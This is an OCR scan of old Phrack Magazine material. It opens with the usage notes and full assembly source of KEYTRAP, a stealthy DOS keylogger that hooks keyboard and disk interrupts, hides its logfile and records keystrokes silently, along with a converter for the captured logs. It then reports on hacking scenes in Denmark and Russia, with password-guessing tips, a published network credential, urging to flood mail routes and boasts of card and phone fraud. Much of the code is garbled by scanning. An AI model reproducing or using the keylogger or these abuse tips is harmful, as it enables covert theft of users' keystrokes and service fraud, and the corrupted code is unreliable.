CONVERT will convert the keyboard scancodes captured by Keytrap 
to their respective keyboard (ASCII) characters. 


Usage: KEYTRAP <dir\logfile> /A /B /C 


A -— Maximum size of logfile 
B - Number of keys to log per session 
C - Number of minutes between each session 


Keytrap is a command line program. 


<dir\logfile> - You MUST specify a directory for the logfile. 
If you don’t specify a directory Keytrap will only look in the 
current directory for the logfile. If the logfile is not found 
in the current directory no writing will occur. Keytrap will 
append the scancode data to the end of the file you specify. 


A - The Maximum size of the logfile. This number is checked only 
when Keytrap is installed. If the size of the logfile exceeds this 
number, Keytrap will delete the logfile and create a new on 


B - This is the number of keys to log per session. Keytrap will 
only check this number AFTER a write to the logfile. So if you 
specify 50 keys, and Keytrap does not get a chance to write till 
there are 100 keys in the buffer, then Keytrap will log 100 keys. 


C - This is the number of minutes between each session. When Keytrap 
reaches or exceeds the number of keys to log per session, it will 
start a delay routine and check this number. You can’t specify more 
then 1440 minutes, the number of minutes ina day ! 


Example: KEYTRAP c:\logfile /20000 /200 /20 
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Keytrap will check "logfile" to see if it exceeds 20,000 

bytes. If it does, Keytrap will delete the log file and then 
create a new one. Keytrap will then install as a TSR program. 

It will log approx 200 keys at a time with a delay of 20 minutes 
between each session. 


Usage: CONVERT logfile outfile 


logfile: The file that contains the scancodes that Keytrap logged. 
outfile: Specify an output file name. 


Theres not too much to say here. This program just converts scancodes 
from the logfile into their respective keyboard (ASCII) characters. 


Keytrap will not display ANY messages. Check the logfile and 
the size of the logfile if your not sure Keytrap is working. 


Keytrap will only make the logfile hidden if the logfile is 
actually created by Keytrap or the maximum size of the logfile 
is reached or exceeded. If you specify a file that already 
exists then Keytrap will not change that files attributes and 
will append all scancode data to the end of the file. 


Keytrap will not crash if the logfile gets deleted while Keytrap 
is in memory. It will just keep looking for the logfile so it can 
write its buffer. A buffer write is not forced until the buffer 
reaches 400 bytes. It will then try to write its buffer during 
the next interrupt 21 call 


If you have any questions or need some help, mail me. 
Below is my public pgp key, don’t e-mail me without it ! 


Deypher (Dcypher@aol.com) 


seriieceret rete BEGIN PGP PUBLIC KEY BLOCK-----— 
Version: 2.6 


mQCNAi 3iD5cAAAEKEAMVUGdgCYzG5av01LSj07ixXm64qsuk6v/dax5XcMoNmOHNUA3 
+t zFOWuVPXuJ5 9mFxE3/rhOqyh8Mcilf4qT6TRIF£Sb8vt zSkF5vW8cNUmOx8Ovt 
B/YQZVmztN1WOPROAmT8ZHbsrNev2rgeyY jouW3 ZOUgA4RKBRYiCTuxD+VO1xAAUR 
tBLEY3lwaGVyIDxEY3lwaGVyQGFVvbC5 jb20+ 

=w2RN 
eterna END PGP PUBLIC KEY BLOCK----- 
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; KEYTRAP v1.0 - Keyboard Key Logger 
; By Dcypher (Dcypher@aol.com) 


; Usage: KEYTRAP <dir\logfile> /A /B /C 


: A - Maximum size of log file. 
‘ B - Number of keys to log per session. 
: C — Minutes between each session. 
’ 
La 
, 
.286 ; 286 or better 
-model small ; 


.code : 
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org 100h ; 
’ 
begin: jmp install : 
, 
, 
, 
db ’ DCYPHER@AOL.COM / KEYTRAP V1.0 ’ ; PLEASE DON’T REMOVE 
, 
buf db 401 dup (0) ; 400 byte buffer 
bufptr dw 0 ; +1 for luck :;) 
’ 
hide db 0 ; save int21 function call 
stimem dw 0 ; grab time when done 
handle dw 0 ; logfile handle 
control db 0 ; control which INT to use 
done_flag db 0 ; session done flag 
must_write db 0 ; must-write flag 
write_amount dw 0 ; amount written to disk 
using_21 db 0 ; already doing an int-21 
, 
old_9Ya_off dw 0 : 
old_9a_seg dw 0 ; 
, 
old_9b_off dw 0 F 
old_9b_seg dw 0 ; 
, 
old_21_off dw 0 . 
old_21_seg dw 0 ; 
, 
datasegm dw 0 ; save data-segment 
, 
delaym dw 0 ; delay, in minutes 
mkeys dw 0 ; maximum number of keys 
logH dw 0 ; log file size 
logL dw 0 ; log file size 
, 
, 
, 
int_9A: pushf : 
pusha ; 
push es i 
push ds ; 
mov ds, datasegm ; we are here 
, 
cmp control, 1 ; use this one ? 
je A91 ; 
call pkey ; process key (scancode) 
, 
A91: pop ds ; 
pop es ; 
popa 7 
popt i 
jmp dword ptr old_9a_off F 
, 
, 
, 
pkey: cmp done_flag, 1 ; completely done ? 
je pk2 7 
cmp bufptr, 400 ; buffer limit reached ? 
jae pk2 - 
, 
in al, 60h 7 get scancode 
, 
cmp al, 39h ; get downstroke and only 
ja pk2 ; as far as spacebar 
cmp al, 2Ah ; 
je pk2 ; no shift 
cmp al, 36h . 
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je pk2 ; no shift 
, 
push 0 
pop es ; 
mov ah, byte ptr es:[417h] ; shift status 
test ah, 43h ; test for both shift keys 
je pkl ; and cap-lock active 
, 
add al, 80h ; show shift or cap-lock 
pkl: mov di, bufptr ; in logfile 
mov buf[di], al ; place scancode in buffer 
inc di : 
mov bufptr, di : 
mov must_write, 1 ; try to write buffer 
, 
pk2: ret 
fs 
¥ 
, 
int_9B: pushf : 
pusha 5 
push es : 
push ds . 
mov ds, datasegm ; we are here 
, 
cmp control, 0 ; use this one ? 
je B91 7 (not really needed) 
call pkey 7 process a key (scancode) 
é 
B91: pop ds 
pop es 7 
popa ; 
popf i 
jmp dword ptr old_9b_off F 
, 
la 
r 
int_21: pushf : 
pusha F 
push es ' 
push ds 
mov ds, datasegm ; here we are 
Vy 
cmp ax, Offffh ; check if already installed 
je D21 F 
, 
cmp using_21, 1 ; might need to call an 
je C21 ; int-21 here so jump if 
mov using_21, 1 ; called from below 
mov hide, ah ; save function # for hiding 
, 
call switch ; always control the int 9’s 
call timer ; always check restart timer 
la 
cmp done_flag, 1 ; completely done ? 
je B21 F 
cmp must_write, ; need to write ? 
jne B21 i; 
cmp bufptr, 400 ; push a write when buffer 
jae A21 sas Eu: 
: 
cmp hide, 3Fh ; disk read 
je A21 ; (hide buffer write) 
cmp hide, 40h ; disk write 
je A21 F 
jmp B21 ; can’t hide, try another time 
Ty 
A21: call saveb ; write buffer 
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, 
B21: mov using_21, 0 ; no int-21 calls anymore 
C213 pop ds ; 
pop es ; 
popa ; 
popf i 
jmp dword ptr old_21_off : 
# 
D21: pop ds ; already installed ! 
pop es ; 
popa 7 
popf ; 
mov ax, 2 ; show installed 
iret - 
 & 
, 
, 
timer: cmp done_flag, 0 ; only check time when 
je timerb ; session is complete ! 
, 
mov ah, 2Ch ; 
int 21h ; what’s the time ? 
mov al, ch ; 
xor ah, ah ; 
mov bx, 60 ; 
mul bx ; multiply hours by 60 
xor chy; ch, ; 
add ax, CX ; add in the minutes 
, 
mov bx, stimem f 
cmp ax, bx ; is time now same as 
je timerb ; when session was completed 
; if so, don’t do anything 
xor Cx; Cx ; 
timerl: cmp bx, 1440 ; midnight then back to 0 
jb timer2 : 
xor bx, bx i 
timer2: inc Cx ; minutes counter 
inc bx ; 
cmp ax, bx ; count until time now 
jne timerl . 
, 
cmp cx, delaym ; 
jb timerb ; should we reset ? 
Vy 
mov done_flag, 0 ; reset / next session 
timerb: ret : 
tf 
a 
, 
switch: mov ax, 3509h ; 
int 21h * 
cmp bx, offset int_9A ; everything ok with 9A ? 
jne swl ; check offset 
mov control; 0 ; show who has control 
ret r 
r 
swl: cmp control, 1 ; 9B already in use ? 
je sw2 ; yes, don’t do anything 
mov ax, 3509h . 
int 21h ; 
mov old_9b_seg, es i 
mov old_9b_off, bx : 
mov ax, 2509h . 
lea dx, int_9B 
int 21h ; use 9B instead of 9A ! 
mov control, 1 ; show who has control 
sw2: ret ; 
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, 
dl 
, 
saveb: mov ax, 3d01lh : 
mov dx, 82h ; 
int 21h ; open logfile, r/w 
Bk probw : 
mov handle, ax ; 
mov bx, ax 7 
mov ax, 4202h ; 
xor CX, CX ; 
xor ax, dx ; 
int 21h ; point to eof 
ake; probw ‘ 
mov ah, 40h ; 
mov bx, handle 7 
mov cx, bufptr 
lea dx, buf : 
int 21h ; write buffer 
je probw ; 
mov ah, 3Eh ; 
mov bx, handle 7 
int 21h ; close logfile 
1 probw F 
TY 
mov cx, bufptr ; no problems writing 
add write_amount, cx ; so add to written amount 
v 
mov cx, mkeys 7 check number of keys logged 
cmp write_amount, cx ; all done ? 
jb donew 
la 
mov done_flag, 1 ; show session complete 
mov write_amount, 0 ; written amount to 0 
call gtime ; grab stop time [minutes] 
, 
donew: mov must_write, 0 ; no need to write anymore 
mov bufptr, 0 ; buffer pointer back to 0 
probw: ret ; try again another time 
; (if problem writing) 
, 
, 
gtime: mov ah, 2Ch ; DONE 
int 21h ; grab time in minutes 
mov al, ch ; 
xor ah, ah ; 
mov bx, 60 7 
mul bx ; multiply hours by 60 
xor chy, “ch. ; 
add ax; “CX ; add in the minutes 
mov stimem, ax ; start time in minutes 
ret ; 
TY 
VY 
TY 
, 
install:mov bx, 80h : 
cmp byte ptr [bx], 0 ; any parameters ? 
je bye i 
TY 
mov ax, Offffh a 
int 21h ; already installed ? 
cmp ax, 1 ; 
je bye i 
TY 
call conv ; convert command line numbers 
je bye ; 
call clog ; check or create logfile 
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, 
mov ax, 3509h 
int 21h ' 
mov old_9a_off, bx ; save old int 9 
mov old_9a_seg, es ; 
mov ah, 25h 
lea dx, int_9A 
int 21h ; hook only 9A to start 
TY 
mov ax, 3521h : 
int 21h 
mov old_21_off,. bx ; save old int 21 
mov old_21_seg, es H 
mov ah, 25h : 
lea ax, int_21 . 
int 21h ; point to new int 21 
TY 
mov datasegm, ds ; save this data segment area 
; for later use in the ISR’s 
mov bx, offset install 
mov ax, 3100h ; 
mov dx, bx : 
mov cl, O4h . 
shr dx, cl 7 
inc dx ; 
int 21h ; end / save above install 
TY 
bye: mov ah, 4Ch ; no installation 
int 21h ; just end 
, 
, 
, 
conv: push ds ; convert command line options 
pop es ; 
mov di, 81h : 
convl: inc di : 
cmp byte ptr [di], 2fh * point ‘te. first. "/" 
jnz convl ; 
inc di ; point to first number 
call mconv ; convert it 
1 conv4 7 any problems ? 
mov logH, dx H 
mov logL, cx ; save max logfile size 
add cx, dx c 
cmp ex; 0 ; make sure not 0 
je conv4 7 
, 
dec di 
conv2: inc di . 
cmp byte ptr [di], 2fh ; point to second "/" 
jnz conv2 - 
inc di ; point to first number 
call mconv ; convert it 
je conv4 ; any problems ? 
cmp ax, O ; bigger then 65535 ? 
ja conv4 H 
mov mkeys, CX ; save key limit 
, 
dec di ; 
conv3: inc di . 
cmp byte ptr [di], 2fh i“ point to. third "/" 
pees conv3 - 
inc di ; point to first number 
call mconv ; convert it 
TC. conv4 7; any problems ? 
cmp ax, 0 ; 
ja conv4 ; bigger then 65535 end 
cmp cx, 1440 
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no comments here, 


main converter 
all I 
that it works ! :) 


number at es: [di] 


carry flag will be set 
if theres a problem 


point to logfile 
find first space 


replace space with 0 


dle 


nter to eof 


ize 


below, not ok 


ja conv4 ; bigger then 1440 end 
mov delaym, cx ; Save session delay time 
roule! 7 show no problems 
ret ; 
conv4: stc 7 show problem 
ret 7 
, 
# 
, 
mconv: xor CX, CX 
mov ax, cx 
mov ah, ch know is 
cld 
dec di 
convl: inc di : 
mov al, es: [di] convert 
xor aly ©0% 
cmp al, 10 
jae convD 
shl 5c; 1 
rcl dx, 1 
ne convD 
mov bx, CX 
mov si, dx 
shl GG, 
rcl dx, 1 
3.¢ convD 
shl cx, 1 
rcl axX~ 1: 
jc convD 
add cx, bx 
adc dk. S21 
Jc convD 
add cl, al 
adc ch, 0 
adc dx, 0 
jc convD 
jmp convl 
convD: ret ; 
TY 
if 
, 
clog: mov bx, 82h - 
nulll: cmp byte ptr [bx], 20h 7 
je null2 
inc bx 
jmp nulll 
null2: mov byte ptr [bx], 0 ; 
, 
mov ax, 3D01h 
mov dx, 82h : 
int 21h ; open the file 
TC clog3 - 
mov handle, ax 7 good open, save han 
, 
mov ax, 4202h : 
mov bx, handle 
xor CK) -Cx 
xor dx, dx 
int 21h mov poi 
TY 
cmp logH, dx check s 
ja clog4 size ok 
cmp logH, dx 
je clogl 
jmp clog2 must be 
clogl: cmp logL, ax ‘ 
ja clog4 size ok 
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clog2: mov ax, 4301h : 
mov dx, 82h fs 
xor CX, CX ; 
int 21h ; change file mode 
mov ah, 41h ; 
mov ax, 82h ; 
int 21h ; delete file 
, 
clog3: mov ah, 3Ch ; create new 
mov cx, 02h ; (hidden) 
mov dx, 82h : 
int 21h ; 
mov handle, ax ; 
: 
clog4: mov bx, handle ; close logfile handle 
mov ah, 3Eh 7 
int 21h ' 
ret 7 
, 
a 
end begin 


KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK 


; CONVERT v1.0 - Keytrap logfile converter 
; By Dcypher@aol.com 


; Usage: CONVERT logfile outfile 


7 logfile - Keytrap’s scancode data (logfile) 
; outfile - Specify an output file name 
286 ; 
model small : 
.code : 
org 100h , 
start: jmp go 7 
inhandle dw 0 c 
inpointH dw 0 ; 
inpointL dw 0 ; 
loaded dw 0 : 
last db 0 ; 
outhandle dw 0 ; 
outoffset dw 0 : 
table ab. 0.02h:;,.. “1 ; scan-code table 
db O003h, '2’ ; 
db 004h, '3’ ; 
db O0O5h, ’4’ ; 
db 006h, '5’ ; 
db OO7h, ‘6’ : 
db O0O08h, ‘7’ ; 
db 009h, '8’ ; 
db OOAh, ‘9’ : 


oxo) 
Nh | 
Q 


OOOO: O-O:'O:.@:'@ 


Dh + 


Nh + 


UE MAR AMWOWO 


Oo 


~ NOS 
3SrAYr 
~ oN 


~ 
~ 


~ os 
~ os 


~ 
~ 


~ 
~ 


~ os 
~ oN 


~ 
~ 


~ 


NX FEqgetnrQdvoos 


~ 
~ 


m 
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a 


aie 


h, OOA 
h, OOA 


PP 


Pp Pp 


D} 


5 


space 
space with shift 


backspace 
backspace with shift 


return 
return with shift 


End of Table 


prtu 
lea 
int 


se: 


ferr 


ah, 
usage 


ah, 


4Ch 


ah, 
namver 
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mov bx, 80h 
cmp byte ptr [bx], 0 
je prtuse 
, 
cal null 
cal check 
BKS) fprob 
la 
gol: call ldata 
call conv 
cal sdata 
cmp last, 1 
jne gol 
jmp bye 
' 
, 
r 
null: mov bx, 81h 
nulll: inc bx 
cmp byte ptr [bx], 20h 
jnz nulll 
mov byte ptr [bx], 0 
Vy 
mov outoffset, bx 
inc word ptr [outoffset] 
4 
null2: inc bx 
cmp byte ptr [bx], ODh 
jnz null2 
mov byte ptr [bx], 0 
ret 
la 
Vy 
, 
check: mov ax, 3D00h 
mov dx, 82h 
int 21h 
ce) check2 
mov bx, ax 
mov ah, 3Eh 
Late 21h 
je check2 
, 
mov ah, 3Ch 
xor CX, CX 
mov dx, outoffset 
int 21h 
jc check2 
mov bx, ax 
mov ah, 3Eh 
int 21h 
jc check2 
, 
cle 
check2: ret 
, 
, 
, 
ldata: mov ax, 3D00h 
mov dx, 82h 
int 21h 
mov inhandle, ax 
TY 
mov ax, 4200h 
mov bx, inhandle 
mov cx, inpointH 
mov dx, inpointL 


int 21h 
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, 
mov ah, 3Fh 
mov bx, inhandle 
mov cx, 60000 
lea dx, eof 
int 21h 
mov loaded, ax 
cmp ax, 60000 
e ldata2 
mov last, 1 
TY 
ldata2: mov ax, 4201h 
mov bx, inhandle 
xor CX. EX 
xor dx, dx 
int 21h 
mov inpointH, dx 
mov inpointL, ax 
, 
mov ah, 3Eh 
mov bx, inhandle 
int 21h 
ret 
, 
a 
, 
conv: mov cx, loaded 
lea si, eof 
é 
convl: lea di, table 
, 
cmp ex. 0 
je convé 
, 
mov al, byte ptr [si] 
conv2: mov ah, byte ptr [di] 
cmp ah, 0 
je conv4 
cmp ah, al 
je conv3 
add di, 2 
jmp conv2 
, 
conv3: inc di 
mov al, byte ptr [di] 
mov byte ptr [si], al 
dec cx 
inc si 
jmp convl 
Lf 
conv4: mov byte ptr [si], 20h 
dec Cx 
inc si 
jmp convl 
, 
convé: ret 
La 
di 
, 
sdata: mov ax, 3D02h 
mov dx, outoffset 
int 21h 
mov outhandle, ax 
TY 
mov ax, 4202h 
mov bx, outhandle 
xor CX, CX 
xor dx, dx 
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int 21h - 
r 
mov ah, 40h ‘ 
mov bx, outhandle ; 
mov cx, loaded ; 
lea dx, eof : 
int 21h 
, 
mov ah, 3Eh : 
mov bx, outhandle . 
int 21h 
ret ; 


namver db 10,13 

db ’CONVERT vl.0’,10,13 
db ’Keytrap logfile converter.’,10,13 
db 'By Dcypher (Dcypher@aol.com)’,10,13 
db 10,13,’S’ 


usage db ’Usage: CONVERT logfile outfile’,10,13 
db 10,13 
db ’ logfile - Keytrap’,27h,’s scancode data.’,10,13 
db ’ outfile - Specify an output file name.’,10,13 
do 10,13,'’S8' 


ferr db ‘WARNING: Problem with one of the files.’,10,13 
db. £013,-S" 


eof db 0 
end start\032 
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==Phrack Magazine== 


Volume Five, Issue Forty-Six, File 27 of 28 
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International Scenes 


There was once a time when hackers were basically isolated. It was 

almost unheard of to run into hackers from countries other than the 
United States. Then in the mid 1980’s thanks largely to the 

existence of chat systems accessible through X.25 networks like 

Altger, tchh and QSD, hackers world-wide began to run into each other. 
They began to talk, trade information, and learn from each other. 

Separate and diverse subcultures began to merge into one collective 

scene and has brought us the hacking subculture we know today. A 
subculture that knows no borders, one whose denizens share the common goal 
of liberating information from its corporate shackles. 


With the incredible proliferation of the Internet around the globe, this 
group is growing by leaps and bounds. With this in mind, we want to help 
further unite the communities in various countries by shedding light 

onto the hacking scenes that exist there. If you want to contribute a 
file about the hacking scene in your country, please send it to us 

at phrack@well.com. 


This month we have files about the scenes in Denmark and Russia, updates 
from Australia and Argentina, and a scan of Norway’s toll-free exchange. 


The Computer Underground in Denmark 


Dear Phrack Readers, what follows is a little about the Danish 
computer underground, focusing on the hacking/phreaking scene. 


A little introduction: 


Even though Denmark itself is little country, with a little over 5 million 
citizens, an active computer underground community thrives upon the growing 
network links and computer systems which in these days seems to pop up all 
over country. 


The history of the hacking community in DK is not very old, but since the 

first Danish hackers appeared some 5 years ago, there has been increasing 
hacking activity, bringing on a history of busts, paranoia and times of war; 
but also a history of great friendships, supremacy over the corporate machine, 
and a process of learning more about the world we live in. But before we tak 

a look at the networks, boards and the community itself, let’s go back in time, 
and find the place where it all started. 


7 
a 


he Past: 


he first hackers to appear in DK was JubJub Bird and Sprocket, two high 
school students which broke into 100’s of computers world wide. At that time 
there was no H/P scene in DK, no boards, no HP networks and no fellow hackers. 
Nevertheless, JubJub’s role in the Danish HP history plays a key role. JubJub 
got busted early January ’90, after being discovered in some of NASA’s non 
public machinery, and being under surveillance for a period of time. This was 
the beginning of what was to become the Danish hacking scene. JubJub and 
Sprocket never got a sentence, since the court had absolutely no idea of how 
to handle a case like this. The court sat down a period of 2 years, and if 
JubJub or Sprocket was caught in hacking within that period they would 

get a verdict. 


Anyway, after the bust of JubJub and Sprocket, the first stirs of hackers 
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appeared and began to expand like rings in water. And suddenly we had a growing 
happy hacking community. Hackers from all over the country gathered at newly 
started ’HPA only boards’ which was a rarely seen thing among the sea of WaReZ 
boards. One of the coolest boards was Fantasia, the headquarters of MoTIGoL, 
which was being run by Netrunner. Fantasia was the largest in Denmark, maybe 
even in Scandinavia, and had callers from all over the world. At that time, 
nobody was afraid of getting busted, and A LOT of BlueBoxing, X25, and general 
hacking on Inet was done. But one day all that changed. 


During the winter ’91 DIKU (Institute of computer science, Copenhagen 
university) was used as a meeting place of hackers. A lot of novice hackers 
used the machines to learn about Internet and UNIX in general, skating through 
the internet, trading info, chatting at IRC and stuff like that. What nobody 
knew was that Jgen Bo Madsen, security expert and high paid consultant 

working for UNI*C, was monitoring all traffic from and off DIKU, with evil 
intentions of busting! The law enforcement specter was soon to cast its dark 
shadow on the whole of the Danish scene. 


It all ended one winter afternoon. I remember turning on the TV, not really 
paying attention to the news, reading a book or so, when suddenly the news 

lady starts speaking about how the secret service is soon to unravel the biggest 
hacker conspiracy ever in Denmark, one hacker was already arrested and 10 more 
would be arrested in near future. Saron was the one who got busted. He had used 
an x25 datapak link, which normally only was used for electronic mail, to 

access DIKU, coming in from a German PAD to make tracing harder, but also 
making a hell of a big bill for the stolen NUI’s owner. Anyway, it came out 

that JBM (Jgen Bo Madsen) had traced 76 calls to DIKU, and had monitored the 
breakins of computers in Greece, Brazil, Mexico and USA. 


At that moment th ntire scene more or less panicked. Most dudes moved 
their precious machinery out of the house and all boards closed down. 

A period of isolation began. The SysOp of Fantasia, Netrunner pulled out his 
harddisk hiding it somewhere out of reach, if JBM and his secret servic 
buddies should show up. 


No more busts happened and people calmed down after a month or so. Everybody 
knew that things wouldn’t be the same after the DIKU incident. Netrunners 
harddisk broke down after he had reinstalled it, because all the dirt it 

had consumed from 2 years constant running, was too much for the thing to 
handle when it was powered back on. So, Fantasia closed and the underground 
network PhoenixNet also closed when it came out that JBM had infiltrated 

the net. An era was over, and a new was to begin. 


[The Present: 


Today’s scene is doing quite good. It has became harder in a way, more 
careful and more closed than ever. But still, we have open boards 
and a public network. FOOnet which focuses on computer security and is 
used as an forum open for discussions. Mostly by hackers and people into 
computer security in general, but every once in awhile JBM and Sysadm’s 
drop by too. Also, the Danish scene is proud to release CrackerJack, made by 
Jackal, which we still claim is the fastest UNIX passwd cracker available for 
t 
a 


PC. Not that cracking passwd files is a major element in hacking, but its nice 
to have fast cracker every once in awhile :) 


The Danish computer underground scene is filled with WaReZ boards, 

but only a few real H/P/A boards are running. Boards like Free Speech Inc. 
and Freeside are places where the Danish hackers hang out. None of these 
boards are public, but JBM is quite aware of them and had once infiltrated 
Freeside, even though it was clearly stated that the bbs was private and 
no one related to any gov agencies was allowed to use the board. So, JBM 
is actually doing what he has accused us for over the years, which is 
intruding people’s privacy. 


Other than FOOnet, there is a few other networks, such as SDC which 
once had a good mail flow in the hacking conferences, but today more 
is turning into a demo/warez net. A few other truly H/P nets are running 
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successful with a good mail flow, but those shall remain anonymous in 
this article. 


The links from the Danish scene to fellow hackers around the world is 

very good. Due to numerous nights spent at QSD, connections is established 
to a lot of dudes in Brazil which frequently drops by Free Speech Inc. and 
Freeside, dudes in UK as well as fellow hackers in US like Alby/Empire. 


Okay, this is it. The section about hacking in Denmark. The stuff 
that you had to read all the above boring shitty sentimental stuff, 
to get to!! 


Hacking in Denmark: 


The two main networks in DK which is used for hacking and meeting fellow 
hackers are, (of course) Internet and the X25 datapak link. Internet is 
accessible via all Universities like diku.dk, daimi.aau.dk, auc.dk and so on. 
(Nobody uses DIKU anymore though). The university is doing a brave struggle 
t 
p 
C 


o keep the hackers out by upgrading to C2 passwd security, meaning that 
asswds must be at least 8 chars, contain 1 uppercase and 1 non alphabetic 
har. 


7 


The upper level of the top 10 of chosen C2 security passwd’s goes something 
like: qlw2e3r4*, als2d3f4*, these do not contain any uppercase chars and 
therefore should not have been accepted as a passwd by the system, but 
apparently the C2 software finds them secure. Also, a nice thing to do is 
taking your wordlist and using Therion’s Passwd Utility, TPU which is a word 
list manipulator, and add a 1* to all words in the list and uppercase the first 
letter. Gives a lot of accounts. 


Another popular thing, in order to keep hackers out, is to setup a so-called 
‘modem security password’ on all dialups. So when you call up the system, 

before you ever get to the server you have to enter a password. And if you get 
through, not all accounts are cleared to use the modem dialup facilities, 

and unless you’ve got your sleazy hands on a cleared account, you get the boot. 


Even though the universities puts such a great effort into keeping 
hackers out, they aren’t doing very good. In fact, they are doing real 
bad. A legit account costs appr. 1900 dkr, which is about a little over 
300S US., which goes into the pockets of UNI*C, so its no wonder that 
we like to use the nice fr facilities present at the universities. 


Other ways to get on Internet, are via other machines under the ministry 

of education and certain private and government systems. It’s surprising 

how many bugs (that we all know of) in certain UNIX versions, that still 

have not been patched, and therefore leave the systems wide open. 

This goes not only for Denmark, but generally throughout machines on Internet 
in Europe. Also, a well known phenomena in DK throughout the sector of 
private corporation computer systems, is lousy security. Elementary 

stuff like bad file permissions, left over suid shell scripts, and 

open guest accounts are everywhere. 


Regarding the X25 datapak links. The official Danish PAD can be 

reached at dialup 171. This is totally free number just like 80xxxxxx 

are, which doesn’t affect your phone bill. Keep in mind that all calls made in 
DK are billed, even local calls within same city are charged, and charged 
high! I remember a time when I was kind of addicted to a certain MUD. For one 
month alone I got a bill on 1800 dkr, appr. 300 USS! So, the 171 X25 link is 
nice thing, since all calls are billed to the owner of the Network User Id 
(NUI) and NOT on your phone bill. 


However, X25 can be a dangerous thing to use. Especially if you only 

have a single NUI to use. The phone company is having some trouble tracing 
the 171, but all calls made in DK on digital lines are logged. So, when 
some corporation gets a bill on, say 2-3000$ or an amount much higher 

than usual, the phone company can compare the logs on who dialed 171, 

to the X25 logs, on which date and time the NUI in question was abused, 
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and figure out who abused the NUI. On analog lines the logging is 

harder to do, and only goes back a month or so. The format of the NUIs 
consist of a user number and a password. The first char indicates 

either a K or J, depending on the NUI’s owner, either located under KTAS 

or JTAS districts. Jutland is covered by JTAS and Copenhagen Sjlland, 

by KTAS. Then follows 7 or 8 numbers and usually a word of 7-8 chars. Like, 
KO1LOO872DKDIANEC, this is a valid NUI open for public use by everybody, 

but its restricted to only to connect to a specific system. Sum lame 

menu database thing. Most NUI’s allows access to most computers, world 

wide on the X25 network, by an NUA (network User Address). The most use 

of X25 is to gain free access to Internet by connecting to a PAD which 
allows telnet. Most of the telnet PAD’s has been closed recently because 

of an increasing (ab)use. However, there is still sites like isosun-t. 
ariadne.gr which carries an X25 PAD, and because the sysadm there comes off 
like a dick and is a jerk I’1ll give u all his NUA. Its 020233181282010. Also, 
check out gw.sdbs.dk, carries a 9k6 x25 link as well as normal Inet axx. 


A few people to mention, who either has or is playing an important 
part of the Danish hacking community: 


JubJub Bird, Sprocket, Saron, Ravan, Netrunner / Sense/NET, Descore, WedLock, 
Le Cerveau, Parrot-Ice, Jackal, Temp, Therion, and myself I guess... :) 


If u like, check out: 


Free Speech Inc. (+45) 4 582 5565 SysOp: NiteCrawler 
Freeside +45) 3 122 3119 "— :; Descor (Off. CJ Dist. site.) 


— 


This is it. Hope u enjoyed this little file. We are always happy to 
meet foreign hackers, so call one of the above boards and lets exchange 
accou.. ehh... intercultural hacking research information :) 


Why would you or why wouldn’t you want 
to hack in the ex-USSR or in other words 
what the hell do we do up here. 


By Digital Empiror and Stupid Fucker 


Russia is a great country, with absolutely no laws against hacking or 
phreaking, both are very easy to do and get away with. It’s for that 
reason, that most of the famous online services like CompuServe and Delphi 
closed registrations coming out of the biggest country in the world via 
SprintNet, (you guys think we still can’t get in? ... take that as a hint). 
If some great telephone company installed a payphone that can charge calls 
onto a credit card (very rare in this country) then we can use it as well, 
credit card numbers are not hard to compile, especially if you know that 
it is not really illegal. What about those great cellular telephones, you 
know, we love to use those for free, (can’t you guys get it? we know that 
we are pain in the ass, but LIVE WITH IT!). 


Most of our switchboards in Russia are very ancient, screwed up 
relay-analog switches, they don’t have methods for protocol-ing 

telephone calls and present undependable methods for identifying telephone 
numbers. Also there is special equipment which allows making it impossible 
to detect your phone number, or even making detection equipment mistake your 
phone number. Interstate switchboards have to have special methods of 
detecting your phone number, which are of course only accessible to 
Interstate switchboards and not to the rest of commercial companies. There 
was a case once were SprintNet caught one of our great hackers, but he had 
sent them to his great grandfather’s (wanna try doing that with the 
FBI?) because as he said ’You can’t really be sure that it was really M 
calling since in this country you can’t rely on your number detection 
equipment...’ 


Gl 
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Another great thing is how the networks are set up in Russia. The greatest 
and the biggest X.25 network is of course SprintNet (for which they have to 
pay of course, if not them then somebody else...), it’s a little slow here, 
but that’s OK. The administrators who set up the PADS are very lame and 
stupid, and of course can’t set up their PADs like SprintNet would want 
them to. They can, for example, they were setting up their PAD so, that it 
would let you connect with virtually ANY system without asking for a NUI, 
and even when they detected, that hackers do it, they couldn’t do anything 
besides changing their PAD instead of just changing one register! 


Besides that, their is no problem with finding a NUI for Russian X.25 
networks, most of them don’t support collect calls like SprintNet, so most 
Russian services that would like their customers to access their servic 

via X.25 give the users a unique NUI, that specifies that they can only 
access THIS service, but they usually forget to set it up right so the 
stupid customers like another of our great hackers, will instead of getting 
charged for the service, go to an outdial and call his favorite BBS in 
Clearwater, FL for an example (do they have boards there?). I don’t know 

if you like to access CitiBank machines from SprintNet, but we love to do 
stuff like that. For example, recently we found a lone standing computer, 

I don’t think the guys in CitiBank really understood what they were doing 
when they left their modem setup option on that machine without a password, 
it was a pleasure to change their modem strings knowing that it’s absolutely 
legal to do so and nobody has even a right to call about it! Also there 

are Internet providers in Russia, only two, from which only one is 
interesting - RELCOM! Most of Internet in Russia is done via UUCP and 

costs a bundle of money, so if I am in a bad mood, I’11 drop 10-20 megs of 
mail into an address that doesn’t exist, and will laugh and you know why? 

In RELCOM, everybody pays the central router - KIAE.SU, so if you send megs 
of stuff, it will go through a lot of systems that will have to pay first 
each other then to KIAE.SU, but there will be THE last system, that will 
say 'ya know? there is no such address!’, so then the trouble will start. 
So if you are in a bad mood, then please, do us a favor, drop a gig or 2 to 
machine that does not have an IP address, better for it to go via a few of 
those machines, for example, to be original: 


kaija.spb.su!arcom.spb.su!<any machine in USA>!kiae.su!kaija.spb.su!root 


I am sure if you have NSLOOKUP, you can be original and make your best 
route via a dozen systems. When doing it, you can be sure, that it will 
call a lot of arguments from every one of that dozen concerning to who will 
pay for that gig (lmb of mail in Russia costs $50 —- $150, that enough money 
for poor Russian Internet hosts). 


It’s all really great, but we are all on our own, and are not organized into a 


group. There are not many of us and we are not known by any of our western 
colleagues, to contact us, mail us at: 


an58736@anon.penet.fi 


PhreeFone Numbers in Norway 
Research and Norwegian Edition by 


cyber aktiF (01-Feb-94) 


English Translation by Codex/DBA (26-Apr-1994) 


DISCLAIMER: The author of this document takes no responsibility as to how 
the information herein is used. I hope everyone who uses this 
information use it for inquisitive purposes only, and don’t 
use it for ANY destructive purposes whatsoever. 


WARNING: Unauthorized use of PBX and other communications equipment 
owned by others, be it private or business, is illegal and may 
